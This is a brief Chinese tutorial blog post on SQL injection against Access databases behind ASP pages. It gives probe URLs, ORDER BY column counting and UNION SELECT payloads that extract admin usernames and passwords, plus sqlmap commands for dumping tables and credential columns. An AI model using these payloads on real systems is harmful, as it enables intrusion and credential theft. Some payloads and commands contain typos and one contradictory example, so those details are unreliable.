您的位置: 首页  >  文章  >  access注入及工具使用

access注入及工具使用

分类: 文章 2025-05-01 17:20:58

Access数据结构:

 Access数据库

          表名

                列名

                     数据

Access注入:

  首先判断是否有注入点:

  http://www.xxx.com/xxx.asp?id=166’(页面返回错误)

http://www.xxx.com/xxx.asp?id=166and 1=1(页面返回正常)

  http://www.xxx.com/xxx.asp?id=166and 1=2 (页面返回错误)

Order by:

例如:http://www.xxx.com/xxx.asp?id=166order by 13 正常

      http://www.xxx.com/xxx.asp?id=166order by 13错误

则代表查询的列名的数目有13个。

猜解表名 确定存在admin表名

http://www.xxx.com/xxx.asp?id=166  UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13 fromadmin

猜解列名 猜解数据

http://www.xxx.com/xxx.asp?id=166UNIONSELECT1,2,username ,4,5,6,7,password,9,10,11,12,13 from admin

 

工具使用:sqlmap 啊D 明小子 穿山甲。

工具功能性:支持数据库类型,支持get postcookie注入 注入突破类型 速度快等

例如:明小子

access注入及工具使用

Sqlmap: 命令(Access数据库):sqlmap.py –u”url”--tebles (查询所有表名)

                   sqlmap.py –u”url” --dump -C”username,password”–T” User”

access注入及工具使用

相关推荐